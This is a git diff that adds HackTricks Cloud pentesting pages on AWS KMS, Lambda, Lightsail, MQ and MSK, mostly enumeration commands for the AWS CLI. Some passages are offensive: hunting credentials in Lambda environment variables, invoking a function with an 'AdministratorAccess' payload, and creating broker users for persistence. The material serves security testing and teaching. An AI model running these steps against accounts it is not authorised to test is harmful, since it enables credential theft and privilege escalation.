+* Allow to delegate your permissions to another AWS principal within your AWS account. You need to create them using the AWS KMS APIs. It can be indicated the CMK identifier, the grantee principal and the required level of opoeration (Decrypt, Encrypt, GenerateDataKey...)
+* After the grant is created a GrantToken and a GratID are issued
+
+**Access**:
+
+* Via **key policy** -- If this exist, this takes **precedent** over the IAM policy
+* Via **IAM policy**
+* Via **grants**
+
+</details>
+
+### Key Administrators
+
+Key administrator by default:
+
+* Have access to manage KMS but not to encrypt or decrypt data
+* Only IAM users and roles can be added to Key Administrators list (not groups)
+* If external CMK is used, Key Administrators have the permission to import key material
+
+### Rotation of CMKs
+
+* The longer the same key is left in place, the more data is encrypted with that key, and if that key is breached, then the wider the blast area of data is at risk. In addition to this, the longer the key is active, the probability of it being breached increases.
+* **KMS rotate customer keys every 365 days** (or you can perform the process manually whenever you want) and **keys managed by AWS every 3 years** and this time it cannot be changed.
+* **Older keys are retained** to decrypt data that was encrypted prior to the rotation
+* In a break, rotating the key won't remove the threat as it will be possible to decrypt all the data encrypted with the compromised key. However, the **new data will be encrypted with the new key**.
+* If **CMK** is in state of **disabled** or **pending** **deletion**, KMS will **not perform a key rotation** until the CMK is re-enabled or deletion is cancelled.
+
+#### Manual rotation
+
+* A **new CMK needs to be created**, then, a new CMK-ID is created, so you will need to **update** any **application** to **reference** the new CMK-ID.
+* To do this process easier you can **use aliases to refer to a key-id** and then just update the key the alias is referring to.
+* You need to **keep old keys to decrypt old files** encrypted with it.
+
+You can import keys from your on-premises key infrastructure .
+
+### Other relevant KMS information
+
+KMS is priced per number of encryption/decryption requests received from all services per month.
+
+KMS has full audit and compliance **integration with CloudTrail**; this is where you can audit all changes performed on KMS.
+
+With KMS policy you can do the following:
+
+* Limit who can create data keys and which services have access to use these keys
+* Limit systems access to encrypt only, decrypt only or both
+* Define to enable systems to access keys across regions (although it is not recommended as a failure in the region hosting KMS will affect availability of systems in other regions).
+
+You cannot synchronize or move/copy keys across regions; you can only define rules to allow access across region.
+
+### Enumeration
+
+```bash
+aws kms list-keys
+aws kms list-key-policies --key-id <id>
+aws kms list-grants --key-id <id>
+aws kms describe-key --key-id <id>
+aws kms get-key-policy --key-id <id> --policy-name <name> # Default policy name is "default"
+aws kms describe-custom-key-stores
+```
+
+### Privesc
+
+{% content-ref url="../aws-privilege-escalation/aws-kms-privesc.md" %}
+[aws-kms-privesc.md](../aws-privilege-escalation/aws-kms-privesc.md)
+{% endcontent-ref %}
+
+### Post Exploitation
+
+{% content-ref url="../aws-post-exploitation/aws-kms-post-exploitation.md" %}
+[aws-kms-post-exploitation.md](../aws-post-exploitation/aws-kms-post-exploitation.md)
+{% endcontent-ref %}
+
+### Persistence
+
+{% content-ref url="../aws-persistence/aws-kms-persistence.md" %}
+[aws-kms-persistence.md](../aws-persistence/aws-kms-persistence.md)
+{% endcontent-ref %}
+
+## References
+
+* [https://docs.aws.amazon.com/kms/latest/developerguide/key-policy-default.html](https://docs.aws.amazon.com/kms/latest/developerguide/key-policy-default.html)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-services/aws-lambda-enum.md b/pentesting-cloud/aws-security/aws-services/aws-lambda-enum.md
new file mode 100644
index 0000000000..34a5e0cc77
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-services/aws-lambda-enum.md
@@ -0,0 +1,210 @@
+# AWS - Lambda Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Lambda
+
+Amazon Web Services (AWS) Lambda is described as a **compute service** that enables the execution of code without the necessity for server provision or management. It is characterized by its ability to **automatically handle resource allocation** needed for code execution, ensuring features like high availability, scalability, and security. A significant aspect of Lambda is its pricing model, where **charges are based solely on the compute time utilized**, eliminating the need for initial investments or long-term obligations.
+
+To call a lambda it's possible to call it as **frequently as you wants** (with Cloudwatch), **expose** an **URL** endpoint and call it, call it via **API Gateway** or even based on **events** such as **changes** to data in a **S3** bucket or updates to a **DynamoDB** table.
+
+The **code** of a lambda is stored in **`/var/task`**.
+
+### Lambda Aliases Weights
+
+A Lambda can have **several versions**.\
+And it can have **more than 1** version exposed via **aliases**. The **weights** of **each** of the **versions** exposed inside and alias will decide **which alias receive the invocation** (it can be 90%-10% for example).\
+If the code of **one** of the aliases is **vulnerable** you can send **requests until the vulnerable** versions receives the exploit.
+
+![](<../../../.gitbook/assets/image (223).png>)
+
+### Resource Policies
+
+Lambda resource policies allow to **give access to other services/accounts to invoke** the lambda for example.\
+For example this is the policy to allow **anyone to access a lambda exposed via URL**:
+
+<figure><img src="https://lh4.googleusercontent.com/4PNFKBdzr3nMrPqeKkTslgwWDKxkXMdQ1SNdv7NPHykj3GX8wODrQyXOFbjk4fxHfZ8pDm5ijWgk2Vq2EGXiPRT3TQfZf1fHycvdEKBuDxJDYos1CJeMHXSeg86ZB-Ol7CNtten6xkVFQj6AhDUEWNQJrQ=s2048" alt=""><figcaption></figcaption></figure>
+
+Or this to allow an API Gateway to invoke it:
+
+<figure><img src="https://lh3.googleusercontent.com/Su0JlR0wBqb-99Z4N_2-_kMlX0Xzx2n_GpZuOPW5IeXR3FYbm8OHFDM3Ora1BpXiSjHpDVUlq4yEyXwaI3nBuze6DJ-wRf2ATsCuWbq0wuBCd34E9uIpqwheE6Cc_PopviI_93O_j2ZKXc1-AJtsBoLVUw=s2048" alt=""><figcaption></figcaption></figure>
+
+### Lambda Database Proxies
+
+When there are **hundreds** of **concurrent lambda requests**, if each of them need to **connect and close a connection to a database**, it's just not going to work (lambdas are stateless, cannot maintain connections open).\
+Then, if your **Lambda functions interact with RDS Proxy instead** of your database instance. It handles the connection pooling necessary for scaling many simultaneous connections created by concurrent Lambda functions. This allows your Lambda applications to **reuse existing connections**, rather than creating new connections for every function invocation.
+
+### Lambda EFS Filesystems
+
+To preserve and even share data **Lambdas can access EFS and mount them**, so Lambda will be able to read and write from it.
+
+### Lambda Layers
+
+A Lambda _layer_ is a .zip file archive that **can contain additional code** or other content. A layer can contain libraries, a [custom runtime](https://docs.aws.amazon.com/lambda/latest/dg/runtimes-custom.html), data, or configuration files.
+
+It's possible to include up to **five layers per function**. When you include a layer in a function, the **contents are extracted to the `/opt`** directory in the execution environment.
+
+By **default**, the **layers** that you create are **private** to your AWS account. You can choose to **share** a layer with other accounts or to **make** the layer **public**. If your functions consume a layer that a different account published, your functions can **continue to use the layer version after it has been deleted, or after your permission to access the layer is revoked**. However, you cannot create a new function or update functions using a deleted layer version.
+
+Functions deployed as a container image do not use layers. Instead, you package your preferred runtime, libraries, and other dependencies into the container image when you build the image.
+
+### Lambda Extensions
+
+Lambda extensions enhance functions by integrating with various **monitoring, observability, security, and governance tools**. These extensions, added via [.zip archives using Lambda layers](https://docs.aws.amazon.com/lambda/latest/dg/configuration-layers.html) or included in [container image deployments](https://aws.amazon.com/blogs/compute/working-with-lambda-layers-and-extensions-in-container-images/), operate in two modes: **internal** and **external**.
+
+* **Internal extensions** merge with the runtime process, manipulating its startup using **language-specific environment variables** and **wrapper scripts**. This customization applies to a range of runtimes, including **Java Correto 8 and 11, Node.js 10 and 12, and .NET Core 3.1**.
+* **External extensions** run as separate processes, maintaining operation alignment with the Lambda function's lifecycle. They're compatible with various runtimes like **Node.js 10 and 12, Python 3.7 and 3.8, Ruby 2.5 and 2.7, Java Corretto 8 and 11, .NET Core 3.1**, and **custom runtimes**.
+
+### Enumeration
+
+```bash
+aws lambda get-account-settings
+
+# List functions and get extra config info
+aws lambda list-functions
+aws lambda get-function --function-name <function_name>
+aws lambda get-function-configuration --function-name <function_name>
+aws lambda list-function-event-invoke-configs --function-name <function_name>
+## Check for creds in env vars
+aws lambda list-functions | jq '.Functions[].Environment'
+## Download & check the source code
+aws lambda get-function --function-name "<func_name>" --query 'Code.Location'
+wget -O lambda-function.zip <url-from-previous-query>
+
+# Get Lambda URL (if any)
+aws lambda list-function-url-configs --function-name <function_name>
+aws lambda get-function-url-config --function-name <function_name>
+
+# Get who has permissions to invoke the Lambda
+aws lambda get-policy --function-name <function_name>
+
+# Versions and Aliases
+aws lambda list-versions-by-function --function-name <func_name>
+aws lambda list-aliases --function-name <func_name>
+
+# List layers
+aws lambda list-layers
+aws lambda list-layer-versions --layer-name <name>
+aws lambda get-layer-version --layer-name <name> --version-number <ver>
+aws lambda get-layer-version-by-arn --arn <name> #Get external ARNs
+
+# List other metadata
+aws lambda list-event-source-mappings
+aws lambda list-code-signing-configs
+aws lambda list-functions-by-code-signing-config --code-signing-config-arn <arn>
+```
+
+### Invoke a lambda
+
+#### Manual
+
+```bash
+# Invoke function
+aws lambda invoke --function-name FUNCTION_NAME /tmp/out
+## Some functions will expect parameters, they will access them with something like:
+## target_policys = event['policy_names']
+## user_name = event['user_name']
+aws lambda invoke --function-name <name> --cli-binary-format raw-in-base64-out --payload '{"policy_names": ["AdministratorAccess], "user_name": "sdf"}' out.txt
+```
+
+#### Via exposed URL
+
+```bash
+aws lambda list-function-url-configs --function-name <function_name> #Get lambda URL
+aws lambda get-function-url-config   --function-name <function_name> #Get lambda URL
+```
+
+#### Call Lambda function via URL
+
+Now it's time to find out possible lambda functions to execute:
+
+```
+aws --region us-west-2 --profile level6 lambda list-functions
+```
+
+![](<../../../.gitbook/assets/image (262).png>)
+
+A lambda function called "Level6" is available. Lets find out how to call it:
+
+```bash
+aws --region us-west-2 --profile level6 lambda get-policy --function-name Level6
+```
+
+![](<../../../.gitbook/assets/image (102).png>)
+
+Now, that you know the name and the ID you can get the Name:
+
+```bash
+aws --profile level6 --region us-west-2 apigateway get-stages --rest-api-id "s33ppypa75"
+```
+
+![](<../../../.gitbook/assets/image (237).png>)
+
+And finally call the function accessing (notice that the ID, Name and function-name appears in the URL): [https://s33ppypa75.execute-api.us-west-2.amazonaws.com/Prod/level6](https://s33ppypa75.execute-api.us-west-2.amazonaws.com/Prod/level6)
+
+`URL:`**`https://<rest-api-id>.execute-api.<region>.amazonaws.com/<stageName>/<funcName>`**
+
+#### Other Triggers
+
+There are a lot of other sources that can trigger a lambda
+
+<figure><img src="../../../.gitbook/assets/image (167).png" alt=""><figcaption></figcaption></figure>
+
+### Privesc
+
+In the following page you can check how to **abuse Lambda permissions to escalate privileges**:
+
+{% content-ref url="../aws-privilege-escalation/aws-lambda-privesc.md" %}
+[aws-lambda-privesc.md](../aws-privilege-escalation/aws-lambda-privesc.md)
+{% endcontent-ref %}
+
+### Unauthenticated Access
+
+{% content-ref url="../aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access.md" %}
+[aws-lambda-unauthenticated-access.md](../aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access.md)
+{% endcontent-ref %}
+
+### Post Exploitation
+
+{% content-ref url="../aws-post-exploitation/aws-lambda-post-exploitation/" %}
+[aws-lambda-post-exploitation](../aws-post-exploitation/aws-lambda-post-exploitation/)
+{% endcontent-ref %}
+
+### Persistence
+
+{% content-ref url="../aws-persistence/aws-lambda-persistence/" %}
+[aws-lambda-persistence](../aws-persistence/aws-lambda-persistence/)
+{% endcontent-ref %}
+
+## References
+
+* [https://docs.aws.amazon.com/lambda/latest/dg/gettingstarted-concepts.html#gettingstarted-concepts-layer](https://docs.aws.amazon.com/lambda/latest/dg/gettingstarted-concepts.html#gettingstarted-concepts-layer)
+* [https://aws.amazon.com/blogs/compute/building-extensions-for-aws-lambda-in-preview/](https://aws.amazon.com/blogs/compute/building-extensions-for-aws-lambda-in-preview/)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.md b/pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.md
new file mode 100644
index 0000000000..3d2778ee1d
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.md
@@ -0,0 +1,85 @@
+# AWS - Lightsail Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## AWS - Lightsail
+
+Amazon Lightsail provides an **easy**, lightweight way for new cloud users to take advantage of AWS’ cloud computing services. It allows you to deploy common and custom web services in seconds via **VMs** (**EC2**) and **containers**.\
+It's a **minimal EC2 + Route53 + ECS**.
+
+### Enumeration
+
+```bash
+# Instances
+aws lightsail get-instances #Get all
+aws lightsail get-instance-port-states --instance-name <instance_name> #Get open ports
+
+# Databases
+aws lightsail get-relational-databases
+aws lightsail get-relational-database-snapshots
+aws lightsail get-relational-database-parameters
+
+# Disk & snapshots
+aws lightsail get-instance-snapshots
+aws lightsail get-disk-snapshots
+aws lightsail get-disks
+
+# More
+aws lightsail get-load-balancers
+aws lightsail get-static-ips
+aws lightsail get-key-pairs
+```
+
+### Analyse Snapshots
+
+It's possible to generate **instance and relational database snapshots from lightsail**. Therefore you can check those the same way you can check [**EC2 snapshots**](aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/#ebs) and [**RDS snapshots**](aws-relational-database-rds-enum.md#enumeration).
+
+### Metadata
+
+**Metadata endpoint is accessible from lightsail**, but the machines are running in an **AWS account managed by AWS** so you don't control **what permissions are being granted**. However, if you find a way to exploit those you would be directly exploiting AWS.
+
+### Privesc
+
+{% content-ref url="../aws-privilege-escalation/aws-lightsail-privesc.md" %}
+[aws-lightsail-privesc.md](../aws-privilege-escalation/aws-lightsail-privesc.md)
+{% endcontent-ref %}
+
+### Post Exploitation
+
+{% content-ref url="../aws-post-exploitation/aws-lightsail-post-exploitation.md" %}
+[aws-lightsail-post-exploitation.md](../aws-post-exploitation/aws-lightsail-post-exploitation.md)
+{% endcontent-ref %}
+
+### Persistence
+
+{% content-ref url="../aws-persistence/aws-lightsail-persistence.md" %}
+[aws-lightsail-persistence.md](../aws-persistence/aws-lightsail-persistence.md)
+{% endcontent-ref %}
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-services/aws-mq-enum.md b/pentesting-cloud/aws-security/aws-services/aws-mq-enum.md
new file mode 100644
index 0000000000..30e76cde66
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-services/aws-mq-enum.md
@@ -0,0 +1,103 @@
+# AWS - MQ Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Amazon MQ
+
+### Introduction to Message Brokers
+
+**Message brokers** serve as intermediaries, facilitating communication between different software systems, which may be built on varied platforms and programmed in different languages. **Amazon MQ** simplifies the deployment, operation, and maintenance of message brokers on AWS. It provides managed services for **Apache ActiveMQ** and **RabbitMQ**, ensuring seamless provisioning and automatic software version updates.
+
+### AWS - RabbitMQ
+
+RabbitMQ is a prominent **message-queueing software**, also known as a _message broker_ or _queue manager_. It's fundamentally a system where queues are configured. Applications interface with these queues to **send and receive messages**. Messages in this context can carry a variety of information, ranging from commands to initiate processes on other applications (potentially on different servers) to simple text messages. The messages are held by the queue-manager software until they are retrieved and processed by a receiving application. AWS provides an easy-to-use solution for hosting and managing RabbitMQ servers.
+
+### AWS - ActiveMQ
+
+Apache ActiveMQ® is a leading open-source, Java-based **message broker** known for its versatility. It supports multiple industry-standard protocols, offering extensive client compatibility across a wide array of languages and platforms. Users can:
+
+* Connect with clients written in JavaScript, C, C++, Python, .Net, and more.
+* Leverage the **AMQP** protocol to integrate applications from different platforms.
+* Use **STOMP** over websockets for web application message exchanges.
+* Manage IoT devices with **MQTT**.
+* Maintain existing **JMS** infrastructure and extend its capabilities.
+
+ActiveMQ's robustness and flexibility make it suitable for a multitude of messaging requirements.
+
+## Enumeration
+
+```bash
+# List brokers
+aws mq list-brokers
+
+# Get broker info
+aws mq describe-broker --broker-id <broker-id>
+## Find endpoints in .BrokerInstances
+## Find if public accessible in .PubliclyAccessible
+
+# List usernames (only for ActiveMQ)
+aws mq list-users --broker-id <broker-id>
+
+# Get user info (PASSWORD NOT INCLUDED)
+aws mq describe-user --broker-id <broker-id> --username <username>
+
+# Lits configurations (only for ActiveMQ)
+aws mq list-configurations
+## Here you can find if simple or LDAP authentication is used
+
+# Creacte Active MQ user
+aws mq create-user --broker-id <value> --password <value> --username <value> --console-access
+```
+
+{% hint style="warning" %}
+TODO: Indicate how to enumerate RabbitMQ and ActiveMQ internally and how to listen in all queues and send data (send PR if you know how to do this)
+{% endhint %}
+
+## Privesc
+
+{% content-ref url="../aws-privilege-escalation/aws-mq-privesc.md" %}
+[aws-mq-privesc.md](../aws-privilege-escalation/aws-mq-privesc.md)
+{% endcontent-ref %}
+
+## Unauthenticated Access
+
+{% content-ref url="../aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.md" %}
+[aws-mq-unauthenticated-enum.md](../aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.md)
+{% endcontent-ref %}
+
+## Persistence
+
+If you know the credentials to access the RabbitMQ web console, you can create a new user qith admin privileges.
+
+## References
+
+* [https://www.cloudamqp.com/blog/part1-rabbitmq-for-beginners-what-is-rabbitmq.html](https://www.cloudamqp.com/blog/part1-rabbitmq-for-beginners-what-is-rabbitmq.html)
+* [https://activemq.apache.org/](https://activemq.apache.org/)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-services/aws-msk-enum.md b/pentesting-cloud/aws-security/aws-services/aws-msk-enum.md
new file mode 100644
index 0000000000..4e2cae9773
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-services/aws-msk-enum.md
@@ -0,0 +1,125 @@
+# AWS - MSK Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Amazon MSK
+
+**Amazon Managed Streaming for Apache Kafka (Amazon MSK)** is a service that is fully managed, facilitating the development and execution of applications processing streaming data through **Apache Kafka**. Control-plane operations, including creation, update, and deletion of **clusters**, are offered by Amazon MSK. The service permits the utilization of Apache Kafka **data-plane operations**, encompassing data production and consumption. It operates on **open-source versions of Apache Kafka**, ensuring compatibility with existing applications, tooling, and plugins from both partners and the **Apache Kafka community**, eliminating the need for alterations in the application code.
+
+In terms of reliability, Amazon MSK is designed to **automatically detect and recover from prevalent cluster failure scenarios**, ensuring that producer and consumer applications persist in their data writing and reading activities with minimal disruption. Moreover, it aims to optimize data replication processes by attempting to **reuse the storage of replaced brokers**, thereby minimizing the volume of data that needs to be replicated by Apache Kafka.
+
+### **Types**
+
+There are 2 types of Kafka clusters that AWS allows to create: Provisioned and Serverless.
+
+From the point of view of an attacker you need to know that:
+
+* **Serverless cannot be directly public** (it can only run in a VPN without any publicly exposed IP). However, **Provisioned** can be configured to get a **public IP** (by default it doesn't) and configure the **security group** to **expose** the relevant ports.
+* **Serverless** **only support IAM** as authentication method. **Provisioned** support SASL/SCRAM (**password**) authentication, **IAM** authentication, AWS **Certificate** Manager (ACM) authentication and **Unauthenticated** access.
+  * Note that it's not possible to expose publicly a Provisioned Kafka if unauthenticated access is enabled
+
+### Enumeration
+
+```bash
+#Get clusters
+aws kafka list-clusters
+aws kafka list-clusters-v2
+
+# Check the supported authentication
+aws kafka list-clusters |  jq -r ".ClusterInfoList[].ClientAuthentication"
+
+# Get Zookeeper endpoints
+aws kafka list-clusters | jq -r ".ClusterInfoList[].ZookeeperConnectString, .ClusterInfoList[].ZookeeperConnectStringTls"
+
+# Get nodes and node enspoints
+aws kafka kafka list-nodes --cluster-arn <cluster-arn>
+aws kafka kafka list-nodes --cluster-arn <cluster-arn> | jq -r ".NodeInfoList[].BrokerNodeInfo.Endpoints" # Get endpoints
+
+# Get used kafka configs
+aws kafka list-configurations #Get Kafka config file
+aws kafka describe-configuration --arn <config-arn> # Get version of config
+aws kafka describe-configuration-revision --arn <config-arn> --revision <version> # Get content of config version
+
+# If using SCRAN authentication, get used AWS secret name (not secret value)
+aws kafka list-scram-secrets --cluster-arn <cluster-arn>
+```
+
+### Kafka IAM Access (in serverless)
+
+```bash
+# Guide from https://docs.aws.amazon.com/msk/latest/developerguide/create-serverless-cluster.html
+# Download Kafka
+wget https://archive.apache.org/dist/kafka/2.8.1/kafka_2.12-2.8.1.tgz
+tar -xzf kafka_2.12-2.8.1.tgz
+
+# In kafka_2.12-2.8.1/libs download the MSK IAM JAR file. 
+cd kafka_2.12-2.8.1/libs
+wget https://github.com/aws/aws-msk-iam-auth/releases/download/v1.1.1/aws-msk-iam-auth-1.1.1-all.jar
+
+# Create file client.properties in kafka_2.12-2.8.1/bin
+security.protocol=SASL_SSL
+sasl.mechanism=AWS_MSK_IAM
+sasl.jaas.config=software.amazon.msk.auth.iam.IAMLoginModule required;
+sasl.client.callback.handler.class=software.amazon.msk.auth.iam.IAMClientCallbackHandler
+
+# Export endpoints address
+export BS=boot-ok2ngypz.c2.kafka-serverless.us-east-1.amazonaws.com:9098
+## Make sure you will be able to access the port 9098 from the EC2 instance (check VPS, subnets and SG)
+
+# Create a topic called msk-serverless-tutorial
+kafka_2.12-2.8.1/bin/kafka-topics.sh --bootstrap-server $BS --command-config client.properties --create --topic msk-serverless-tutorial --partitions 6
+
+# Send message of every new line
+kafka_2.12-2.8.1/bin/kafka-console-producer.sh --broker-list $BS --producer.config client.properties --topic msk-serverless-tutorial
+
+# Read messages
+kafka_2.12-2.8.1/bin/kafka-console-consumer.sh --bootstrap-server $BS --consumer.config client.properties --topic msk-serverless-tutorial --from-beginning
+```
+
+### Privesc
+
+{% content-ref url="../aws-privilege-escalation/aws-msk-privesc.md" %}
